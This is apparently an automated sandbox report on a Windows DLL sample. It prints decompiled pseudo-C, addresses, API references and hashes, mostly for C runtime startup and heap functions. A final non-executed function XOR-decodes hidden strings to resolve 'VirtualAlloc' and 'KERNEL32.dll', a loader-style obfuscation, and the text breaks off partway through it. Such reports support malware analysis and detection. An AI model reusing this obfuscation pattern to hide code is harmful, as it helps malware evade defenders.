				_t14 =  *_t33;
				while(_t14 != 0) {
					if(_t14 != 0x3d) {
						_t50 = _t50 + 1;
					}
					_t36 = _t59;
					_t53 = _t36 + 1;
					do {
						_t15 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t15 != 0);
					_t59 = _t59 + 1 + _t36 - _t53;
					_t14 =  *_t59;
				}
				_t3 = _t50 + 1; // 0x1
				_t54 = E6EDA6AE6(_t3, 4);
				if(_t54 == 0) {
					L19:
					_t54 = 0;
					goto L20;
				} else {
					_v8 = _t54;
					while(1) {
						_t51 =  *_t33;
						if(_t51 == 0) {
							break;
						}
						_t41 = _t33;
						_t62 = _t41 + 1;
						do {
							_t20 =  *_t41;
							_t41 = _t41 + 1;
						} while (_t20 != 0);
						_t21 = _t41 - _t62 + 1;
						_v12 = _t21;
						if(_t51 == 0x3d) {
							L15:
							_t33 = _t33 + _t21;
							continue;
						} else {
							_t22 = E6EDA6AE6(_t21, 1); // executed
							_t63 = _t22;
							if(_t63 == 0) {
								_push(_t54);
								L22();
								E6EDA6B43(0);
								goto L19;
							} else {
								_t24 = E6EDA5FEE(_t63, _v12, _t33);
								_t68 = _t68 + 0xc;
								if(_t24 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t26 = E6EDA6A26();
									asm("int3");
									_push(_t63);
									_t64 = _v40;
									if(_t64 != 0) {
										_t27 =  *_t64;
										_push(_t54);
										_t56 = _t64;
										while(_t27 != 0) {
											E6EDA6B43(_t27);
											_t56 = _t56 + 4;
											_t27 =  *_t56;
										}
										_t26 = E6EDA6B43(_t64);
									}
									return _t26;
								} else {
									_t29 = _v8;
									 *_t29 = _t63;
									_v8 = _t29 + 4;
									E6EDA6B43(0);
									_t21 = _v12;
									goto L15;
								}
							}
						}
						goto L28;
					}
					L20:
					E6EDA6B43(0);
					return _t54;
				}
				L28:
			}

0x6eda5af4
0x6eda5af6
0x6eda5af9
0x6eda5afd
0x6eda5aff
0x6eda5b1b
0x6eda5b05
0x6eda5b07
0x6eda5b07
0x6eda5b08
0x6eda5b0a
0x6eda5b0d
0x6eda5b0d
0x6eda5b0f
0x6eda5b10
0x6eda5b17
0x6eda5b19
0x6eda5b19
0x6eda5b1f
0x6eda5b2a
0x6eda5b30
0x6eda5ba0
0x6eda5ba0
0x00000000
0x6eda5b32
0x6eda5b32
0x6eda5b89
0x6eda5b89
0x6eda5b8d
0x00000000
0x00000000
0x6eda5b37
0x6eda5b39
0x6eda5b3c
0x6eda5b3c
0x6eda5b3e
0x6eda5b3f
0x6eda5b45
0x6eda5b48
0x6eda5b4e
0x6eda5b87
0x6eda5b87
0x00000000
0x6eda5b50
0x6eda5b53
0x6eda5b58
0x6eda5b5e
0x6eda5b91
0x6eda5b92
0x6eda5b99
0x00000000
0x6eda5b60
0x6eda5b65
0x6eda5b6a
0x6eda5b6f
0x6eda5bb5
0x6eda5bb6
0x6eda5bb7
0x6eda5bb8
0x6eda5bb9
0x6eda5bba
0x6eda5bbf
0x6eda5bc5
0x6eda5bc6
0x6eda5bcb
0x6eda5bcd
0x6eda5bcf
0x6eda5bd0
0x6eda5be0
0x6eda5bd5
0x6eda5bda
0x6eda5bdd
0x6eda5bdf
0x6eda5be5
0x6eda5beb
0x6eda5bee
0x6eda5b71
0x6eda5b71
0x6eda5b76
0x6eda5b7b
0x6eda5b7e
0x6eda5b83
0x00000000
0x6eda5b86
0x6eda5b6f
0x6eda5b5e
0x00000000
0x6eda5b4e
0x6eda5ba2
0x6eda5ba4
0x6eda5bb2
0x6eda5bb2
0x00000000

APIs

_free.LIBCMT ref: 6EDA5B7E
_free.LIBCMT ref: 6EDA5B99
_free.LIBCMT ref: 6EDA5BA4

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0d5eac2380716d913f0def540b639b84f161f20560829a1212fe5ae9119633fd
Instruction ID: 7cbf56302acd10fca3076670d9e7723dd389751dd8b9edbe2db38eb6845a03f8
Opcode Fuzzy Hash: 0d5eac2380716d913f0def540b639b84f161f20560829a1212fe5ae9119633fd
Instruction Fuzzy Hash: 8E214D3651C214EFDB048FEDE851BEE7769DF86325F140599EB9897241E633CB0283A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA37B4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6EDA37B4(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6EDA4120(__ebx, __edi, __esi);
				_t43 = E6EDA3DFE(__ecx, __edx, 0); // executed
				_t90 = 0x6edc13d8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6EDA3D03();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6edc3bb0;
					if( *0x6edc3bb0 != 0) {
						E6EDA3F9D(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6edc13f8);
						E6EDA4120(1, __edi, __esi);
						_t48 =  *0x6edc3870; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6edc3870 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6EDA3D03();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6edc3bb0 - 2;
							if( *0x6edc3bb0 != 2) {
								E6EDA3F9D(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6edc1420);
								E6EDA4120(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6EDA3761(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E6EDA2A70( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E6EDA2A70( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6EDA3761(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6EDA3A76( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6edc3870 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6EDA3DCE(1, _t90, 1, _t113);
								E6EDA3C8A();
								E6EDA40EC();
								 *0x6edc3bb0 =  *0x6edc3bb0 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6EDA3950();
								_t67 = E6EDA3F6F( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6EDA395D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6edc3bb0 = 1;
						if(E6EDA3D60(_t132) != 0) {
							E6EDA3C7E(E6EDA40C0());
							E6EDA3CA2();
							_t80 = E6EDA5347(0x6edae114, 0x6edae124);
							_pop(_t102);
							if(_t80 == 0 && E6EDA3D35(1, _t102) != 0) {
								E6EDA5300(_t102, 0x6edae108, 0x6edae110);
								 *0x6edc3bb0 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6EDA3897();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6EDA3F97();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6EDA3EBE(_t85, _t106, _t121, _t138) != 0) {
									 *0x6edae104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6edc3870 =  *0x6edc3870 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6eda37b4
0x6eda37b4
0x6eda37b4
0x6eda37b4
0x6eda37bb
0x6eda37c2
0x6eda37c7
0x6eda37ca
0x6eda38a1
0x6eda38a1
0x6eda38a1
0x00000000
0x6eda37d0
0x6eda37d5
0x6eda37d8
0x6eda37da
0x6eda37dd
0x6eda37e1
0x6eda37e8
0x6eda38b5
0x6eda38ba
0x6eda38bb
0x6eda38bd
0x6eda38c2
0x6eda38c7
0x6eda38cc
0x6eda38ce
0x6eda38d5
0x6eda38dd
0x6eda38e0
0x6eda38e9
0x6eda38ec
0x6eda38ef
0x6eda38f6
0x6eda3965
0x6eda396a
0x6eda396b
0x6eda396d
0x6eda3972
0x6eda3977
0x6eda397a
0x6eda397c
0x6eda398d
0x6eda398d
0x6eda3991
0x6eda3994
0x6eda39a0
0x6eda39a0
0x6eda39ad
0x6eda39af
0x6eda39b2
0x6eda39b4
0x6eda39bf
0x6eda39c4
0x6eda39c6
0x6eda39c9
0x6eda39cb
0x00000000
0x00000000
0x6eda39cb
0x6eda3996
0x6eda3996
0x6eda3999
0x00000000
0x6eda399b
0x6eda399b
0x6eda39d1
0x6eda39d1
0x6eda39db
0x6eda39dd
0x6eda39e0
0x6eda39e3
0x6eda39e5
0x6eda39e7
0x6eda39e9
0x6eda39ee
0x6eda39f3
0x6eda39f5
0x6eda39f5
0x6eda39fb
0x6eda39fc
0x6eda3a01
0x6eda3a07
0x6eda3a07
0x6eda39e7
0x6eda3a0c
0x6eda3a0e
0x6eda3a15
0x6eda3a1f
0x6eda3a21
0x6eda3a24
0x6eda3a26
0x6eda3a32
0x6eda3a5a
0x6eda3a5a
0x6eda3a10
0x6eda3a10
0x6eda3a13
0x00000000
0x00000000
0x6eda3a13
0x6eda3a0e
0x6eda3999
0x6eda3a5d
0x6eda3a64
0x6eda397e
0x6eda397e
0x6eda3984
0x00000000
0x6eda3986
0x6eda3986
0x6eda3986
0x6eda3984
0x6eda3a69
0x6eda3a75
0x6eda38f8
0x6eda38f8
0x6eda38fd
0x6eda3902
0x6eda3907
0x6eda390e
0x6eda3912
0x6eda391c
0x6eda3928
0x6eda392a
0x6eda392a
0x6eda392c
0x6eda392f
0x6eda3936
0x6eda393b
0x00000000
0x6eda393b
0x6eda38d0
0x6eda38d0
0x6eda393d
0x6eda3940
0x6eda394c
0x6eda394c
0x6eda37ee
0x6eda37ee
0x6eda37ff
0x6eda3806
0x6eda380b
0x6eda381a
0x6eda3820
0x6eda3823
0x6eda3838
0x6eda383f
0x6eda3849
0x6eda384b
0x6eda384b
0x6eda3823
0x6eda384e
0x6eda3855
0x6eda385c
0x00000000
0x6eda385e
0x6eda3863
0x6eda3865
0x6eda3868
0x6eda386a
0x6eda3873
0x6eda3881
0x6eda3887
0x6eda3887
0x6eda3873
0x6eda3889
0x6eda3891
0x6eda3891
0x6eda38a3
0x6eda38a6
0x6eda38b2
0x6eda38b2
0x6eda37e8

APIs

__RTC_Initialize.LIBCMT ref: 6EDA3801

Part of subcall function 6EDA3C7E: InitializeSListHead.KERNEL32(6EDC3B98,6EDA380B,6EDC13D8,00000010,6EDA379C,?,?,?,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420), ref: 6EDA3C83

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EDA386B

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: f4bf99fd76a75b942ce1e27152ba0417ab960f5bf9d7eed0ab2d888bf6395e19
Instruction ID: ea166d25d5f8c3b16b471f89d42d79e255e71077c764db91957e62c4bc463ee5
Opcode Fuzzy Hash: f4bf99fd76a75b942ce1e27152ba0417ab960f5bf9d7eed0ab2d888bf6395e19
Instruction Fuzzy Hash: AC21D131948242DADB006BFCD81D3DC37679F0666CF100859EB416F2C1CB629349C676

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA80D4, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6EDA80D4() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x6edc3f50 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6edc4254; // 0x137cfa0
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x6eda80d9
0x6eda80db
0x6eda80df
0x6eda80e8
0x6eda80f3
0x6eda8103
0x6eda8107
0x6eda810a
0x6eda811c
0x6eda810c
0x6eda810f
0x6eda8118
0x6eda8111
0x6eda8114
0x6eda8114
0x6eda810f
0x6eda811e
0x6eda8126
0x6eda812b
0x6eda813a
0x6eda8131
0x6eda8132
0x6eda8132
0x6eda813e
0x6eda815c
0x6eda8160
0x6eda8167
0x6eda816e
0x6eda8170
0x6eda8173
0x6eda8173
0x6eda8140
0x6eda8140
0x6eda8143
0x6eda8149
0x6eda8154
0x6eda8156
0x6eda8156
0x6eda814b
0x6eda814b
0x6eda814b
0x6eda8149
0x6eda80fb
0x6eda80fb
0x6eda80fb
0x6eda817a
0x6eda817b
0x6eda8187

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6EDA8120
GetFileType.KERNELBASE(00000000), ref: 6EDA8132

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: da3d1868c42aef4b1ce7ca9bd6d1436f29892ac93cee1b8b116c1f588b52ebbb
Instruction ID: a011cc79e47053b8d330e2bb294b39cc9857fec18feac84b8fcdb144878a3afa
Opcode Fuzzy Hash: da3d1868c42aef4b1ce7ca9bd6d1436f29892ac93cee1b8b116c1f588b52ebbb
Instruction Fuzzy Hash: A111B439604BC3CAD7604BBECC9C612BAA4A757371B24071DDAF6865F1C334D686C641

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5A9C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA5A9C(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6eda5aa1

APIs

Part of subcall function 6EDA7F29: GetEnvironmentStringsW.KERNEL32 ref: 6EDA7F32
Part of subcall function 6EDA7F29: _free.LIBCMT ref: 6EDA7F91
Part of subcall function 6EDA7F29: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EDA7FA0

_free.LIBCMT ref: 6EDA5ADC
_free.LIBCMT ref: 6EDA5AE3

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 8460bbe5cb118659679e1691a821a94165189f102992640d2c7722e1f692038e
Instruction ID: 7ccb58c66a8cf176fd497b08ee2f41edc0fc4a2249475a2b79a93996be26624d
Opcode Fuzzy Hash: 8460bbe5cb118659679e1691a821a94165189f102992640d2c7722e1f692038e
Instruction Fuzzy Hash: 56E0EC13A0551199A2515FFFEC4458E31185B42778B250656EA20C71C0DB60D70201E1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6AE6, Relevance: 1.3, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA6AE6(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = HeapAlloc( *0x6edc4230, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6EDA950C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6EDA6AD3(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6EDA86FF(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6eda6aec
0x6eda6af1
0x6eda6aff
0x6eda6aff
0x6eda6b05
0x6eda6b07
0x6eda6b07
0x6eda6b1e
0x6eda6b27
0x6eda6b2f
0x00000000
0x00000000
0x6eda6b0f
0x6eda6b11
0x6eda6b33
0x6eda6b38
0x6eda6b3e
0x00000000
0x6eda6b3e
0x6eda6b1a
0x6eda6b1c
0x00000000
0x00000000
0x6eda6b1c
0x00000000
0x6eda6b1e
0x6eda6af7
0x6eda6afd
0x00000000
0x00000000
0x00000000

APIs

HeapAlloc.KERNEL32(00000008,?,00000000,?,6EDA66E5,00000001,00000364,00000004,000000FF,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA6B27

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 445844bfc0f7372bd1dff77d2c6b0ade16b16d5ddc05930fbddc02473512c3c4
Instruction ID: eeba089cab2de7083df7726299e5e29430195d5ec92df413d8517da957bdcee7
Opcode Fuzzy Hash: 445844bfc0f7372bd1dff77d2c6b0ade16b16d5ddc05930fbddc02473512c3c4
Instruction Fuzzy Hash: F2F0BE32625626EABB515FEED815B8F775CEF42B60B009021AE34AA0C4CB70DB0187F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EDA1000, Relevance: 44.9, Strings: 35, Instructions: 1114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E6EDA1000(void* __edi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v340;
				char _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				char _v420;
				char _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char _v440;
				char _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				char _v556;
				char _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char _v604;
				char _v608;
				char* _t539;
				char* _t540;
				char* _t544;
				char* _t545;
				char* _t549;
				char* _t550;
				char* _t554;
				char* _t555;
				char* _t559;
				char* _t560;
				char* _t564;
				char* _t565;
				char* _t569;
				char* _t570;
				char* _t574;
				char* _t575;
				char* _t579;
				char* _t580;
				char* _t584;
				char* _t585;
				char* _t589;
				char* _t590;
				char* _t594;
				char* _t595;
				char* _t599;
				char* _t600;
				char* _t604;
				char* _t605;
				char* _t609;
				char* _t610;
				char* _t614;
				char* _t615;
				void* _t744;
				void* _t746;
				void* _t748;
				void* _t750;
				void* _t752;
				void* _t754;
				void* _t756;
				void* _t758;
				void* _t760;
				void* _t762;
				void* _t764;
				void* _t766;
				void* _t768;
				void* _t770;
				void* _t772;
				void* _t774;
				void* _t776;
				void* _t778;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t786;
				void* _t788;
				void* _t790;
				void* _t792;
				void* _t794;
				void* _t796;
				void* _t798;
				void* _t800;
				void* _t802;
				void* _t804;
				void* _t806;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				void* _t840;
				signed int _t841;
				void* _t843;
				void* _t844;
				void* _t845;
				void* _t846;
				void* _t847;
				void* _t848;
				void* _t849;
				void* _t850;
				void* _t851;
				void* _t852;
				void* _t853;
				void* _t854;
				void* _t855;
				void* _t856;
				void* _t857;
				void* _t858;
				void* _t859;

				_t840 = __edi;
				_t843 = (_t841 & 0xfffffff8) - 0x260;
				_v444 = 0;
				_v440 = 0x47e224ad;
				_v436 = 0x3b832da3;
				_v432 = 0x65dc05c8;
				_v428 = 0x9b061e6;
				if(_v444 == 0) {
					_t839 = 0;
					do {
						 *(_t843 + 0xac + _t839 * 4) =  *(_t843 + 0xac + _t839 * 4) ^ 0x09b061e6;
						_t839 = _t839 + 1;
					} while (_t839 < 4);
				}
				_v464 = 0;
				_v460 = 0xa4dd0c5;
				_v456 = 0x3f53d8e6;
				_v452 = 0x1d50d5ff;
				_v448 = 0x7e3fb993;
				if(_v464 == 0) {
					_t838 = 0;
					do {
						 *(_t843 + 0x98 + _t838 * 4) =  *(_t843 + 0x98 + _t838 * 4) ^ 0x7e3fb993;
						_t838 = _t838 + 1;
					} while (_t838 < 4);
				}
				E6EDA4690(_t840, "VirtualAlloc", 0, 0x200);
				_t744 = 0;
				 *0x6edc4498 = 0;
				_t844 = _t843 + 0xc;
				_t539 =  &_v460;
				if(_v460 != 0) {
					do {
						_t539 = _t539 + 1;
						_t744 = _t744 + 1;
					} while ( *_t539 != 0);
				}
				_t745 = _t744 + 1;
				if(_t744 + 1 != 0) {
					E6EDA4B70("VirtualAlloc",  &_v460, _t745);
					_t844 = _t844 + 0xc;
				}
				_t746 = 0;
				_t540 =  &_v440;
				if(_v440 != 0) {
					do {
						_t540 = _t540 + 1;
						_t746 = _t746 + 1;
					} while ( *_t540 != 0);
				}
				_t747 = _t746 + 1;
				if(_t746 + 1 != 0) {
					E6EDA4B70("KERNEL32.dll",  &_v440, _t747);
